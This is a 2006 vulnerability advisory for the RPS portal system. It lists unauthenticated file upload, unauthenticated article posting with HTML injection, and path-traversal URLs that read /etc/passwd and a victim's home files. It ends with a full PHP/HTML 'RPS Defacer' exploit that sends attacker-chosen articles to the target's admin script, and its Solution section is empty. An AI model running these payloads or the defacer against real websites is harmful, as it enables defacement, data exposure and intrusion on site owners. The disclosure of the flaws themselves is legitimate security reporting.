###########################################################################<br># Advisory #13 Title: Multiple Vulnerabilities RPS (rigter portal system)<br># <br># <br># Author: 0o_zeus_o0 ( Arturo Z. )<br># Contact: <a href="mailto:zeus@diosdelared.com">
zeus@diosdelared.com</a><br># Website: <a href="http://www.elitemexico.org">www.elitemexico.org</a><br># Date: 18/07/06<br># Risk: medium<br># Vendor Url: <a href="http://rps.rigtersir.com/">http://rps.rigtersir.com/</a><br>
# Affected Software: RPS<br># Non Affected: RPS V 4<br>#<br>#Info:<br>##################################################################<br>#UPLOAD FILES<br># it allows the user to raise archives without having administration privileges
<br>#<br>#<br>#SQL inyección<br>#it allows the user to insert post without having to be admin with this can make xss or <br>#HTML injection<br>#<br>#<br>#example of upload files<br>##################################################################
<br>#<br>#http://www.vuln.com/[path]/adm/photos/images.php<br>#<br>#http://www.vuln.com/[path]//adm/down/files.php<br>#<br>##################################################################<br>#example Remote Execution<br>
##################################################################<br>#<br>#http://www.vuln.com/[path]/index.php?id=../../../../../etc/passwd<br>#<br>#http://www.vuln.com/[path]/index.php?id=../../../home/victim/public_html/index
<br>#<br>##################################################################<br>#<br>#Solution:<br>##################################################################<br>#<br>#<br>#VULNERABLE VERSIONS<br>##################################################################
<br># v1.0, 2.0 3.0<br>#<br>##################################################################<br>#Contact information<br>#0o_zeus_o0<br>#zeus@<a href="http://diosdelared.com">diosdelared.com</a><br>#www.elitemexico.org<br>
##################################################################<br>#greetz: lady fire,Mi beba, olimpus klan team and elitemexico<br># <br>#Original Advisory: <a href="http://zeus.pccentervillaflores.com//13.txt">http://zeus.pccentervillaflores.com//13.txt
</a><br>##################################################################<br><br>SQL inyección in "Articulos" exploit<br><br><?php<br>/*<br>RPS Defacer by: 0o_ZEUS_o0 OliMpusKlaN •~ FX ~•<br>Date: 08/01/06<br>
Website: <a href="http://www.elitemexico.org">www.elitemexico.org</a><br>*/<br>?><br><html><br><br><head><br><title>RPS Defacer</title><br></head><br><br><body text="#FFFFFF" bgcolor="#000000">
<br><br><p align="center"><font face="Verdana" size="2"><b><u><font color="#FF0000">RPS Defacer<br><br><br><br></font><br></u><font color="#FF0000">0o_ZEUS_o0 OliMpusKlaN <br /> •~ FX ~•</font></b></font></p>
<br><form method="POST" ACTION="?action=enviar" name="rps_defacer"><br> <center><br> <table border="0" cellpadding="5" cellspacing="0" style="border-collapse: collapse" width="40%">
<br> <tr><br> <td width="100%"><b><font face="Verdana" size="1">Direccion:<br><br> <input type="text" name="url" size="30" value="http://"></font></b></td>
<br> </tr><br> <tr><br> <td width="100%"><b><font size="1" face="Verdana">Autor:<br><br> <input type="text" name="autor" size="20"></font></b></td>
<br> </tr><br> <tr><br> <td width="100%"><b><font face="Verdana"><font size="1">Email:<br><br> <input type="text" name="email" size="20"></font></font></b></td>
<br> </tr><br> <tr><br> <td width="100%"><b><font size="1" face="Verdana">Titulo:<br><br> <input type="text" name="titulo" size="30"></font></b></td>
<br> </tr><br> <tr><br> <td width="100%"><b><font size="1" face="Verdana">Contenido: (Soporta<br> HTML Inyection)<br><br> <textarea rows="13" name="articulo" cols="55"></textarea></font></b></td>
<br> </tr><br> <tr><br> <td width="100%"><br> <p align="center"><b><font face="Verdana" size="1"><br> <input type="submit" value="Enviar" name="send">
<br> <input type="reset" value="Restablecer" name="delete"></font></b></td><br> </tr><br> </table><br> </center><br> </div><br>
</form><br><?<br><br>if($action=="enviar"){<br><br>$web= $_POST['url'];<br><br>echo "<script LANGUAGE=\"JavaScript\"><br><br>var pagina=\"$web/adm/add_art.php\"<br>function redireccionar()
<br>{<br>location.href=pagina<br>}<br>setTimeout (\"redireccionar()\", 0001);<br><br></script>";<br>}<br>?><br><br></body><br><br></html><br><br>